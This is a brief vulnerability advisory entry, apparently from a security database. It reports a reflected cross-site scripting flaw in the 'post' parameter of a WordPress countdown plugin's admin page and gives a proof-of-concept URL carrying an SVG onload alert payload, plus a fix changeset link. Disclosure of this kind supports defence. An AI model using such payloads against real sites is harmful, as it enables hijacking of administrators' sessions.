EPSS
Percentile
30.0%
The plugin does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/post-new.php?post_type=ycdcountdown&post="><svg onload=alert(/XSS/)>
plugins.trac.wordpress.org/changeset/2679245